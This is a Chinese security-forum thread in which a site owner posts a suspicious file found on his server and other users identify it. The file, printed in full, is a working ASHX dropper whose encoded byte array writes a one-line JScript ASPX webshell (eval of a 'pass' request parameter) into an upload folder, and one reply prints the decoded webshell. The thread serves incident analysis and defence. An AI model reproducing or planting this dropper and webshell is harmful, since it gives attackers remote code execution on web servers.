吾爱破解 - LCG - LSG |安卓破解|病毒分析|www.52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 1593|回复: 14
收起左侧

PHP 临时文件夹出现这样的文件是怎么来的,想干啥呢?

[复制链接]
zhansh 发表于 2022-9-15 20:49
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
<%@ WebHandler Language="C#" Class="Handler" %>
using System;
using System.Web;
using System.IO;


public class Handler : IHttpHandler
{
    public bool IsReusable
    {
        get
        {
            return false;
        }
    }
    public void ProcessRequest(HttpContext context)
    {
        byte[] b={0x3C, 0x25, 0x40, 0x20, 0x50, 0x61, 0x67, 0x65, 0x20, 0x4C, 0x61, 0x6E, 0x67, 0x75, 0x61, 0x67, 0x65, 0x3D, 0x22, 0x4A, 0x73, 0x63, 0x72, 0x69, 0x70, 0x74, 0x22, 0x25, 0x3E, 0x3C, 0x25, 0x65, 0x76, 0x61, 0x6C, 0x28, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x2E, 0x49, 0x74, 0x65, 0x6D, 0x5B, 0x22, 0x70, 0x61, 0x73, 0x73, 0x22, 0x5D, 0x2C, 0x22, 0x75, 0x6E, 0x73, 0x61, 0x66, 0x65, 0x22, 0x29, 0x3B, 0x25, 0x3E};
        try
        {
            File.WriteAllBytes(context.Server.MapPath("/e/upload/s1/article/file/")+"/ajlss.aspx",b);
            context.Response.Write("oooooooookkkkkkkkk");
        }
        catch(Exception ex)
        {
            context.Response.Write(ex.Message);
        }
        context.Response.End();
    }
}

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

 楼主| zhansh 发表于 2022-9-15 21:37
mwmbfh 发表于 2022-9-15 21:29
具体干什么的不太懂。
估计是被突破了。记得删除文件,然后看看PHP文件夹的权限。查看一下系统日志和文件 ...

感觉有点异常,但是不知道怎么传上来的,总是有很多类似的文件,所有者都是 IUSR
mwmbfh 发表于 2022-9-15 21:29
具体干什么的不太懂。
估计是被突破了。记得删除文件,然后看看PHP文件夹的权限。查看一下系统日志和文件属性。
千万小心勒索病毒。重要文件赶快备份,然后最好把这个机器和其他终端设备做一个通信隔离。
安全第一啊。
 楼主| zhansh 发表于 2022-9-15 20:51
wychashe 发表于 2022-9-16 08:11
帝国系统?
好好学习多挣钱 发表于 2022-9-16 08:17
那一段byte转换结果是
<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
其他的我就不懂了
KSPprince 发表于 2022-9-16 08:36
被挂马了,然后它再通过这个文件post下,就可以生成一个一句话木马文件
4899 发表于 2022-9-16 09:10
好好学习多挣钱 发表于 2022-9-16 08:17
那一段byte转换结果是

其他的我就不懂了

一句话木马
ldwz 发表于 2022-9-16 10:24
好好学习多挣钱 发表于 2022-9-16 08:17
那一段byte转换结果是

其他的我就不懂了

PHP木马~~~悲剧了~
Yo丨Se7ven 发表于 2022-9-16 11:45
执行php文件,向目录/e/upload/s1/article/file/写入aspx文件,文件内容就是那段加密的一句话木马,如果该目录可以执行aspx文件,你服务器就危险了,aspx提权很容易拿到服务器root。
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则 警告:本版块禁止灌水或回复与主题无关内容,违者重罚!

快速回复 收藏帖子 返回列表 搜索

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-5-6 10:35

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表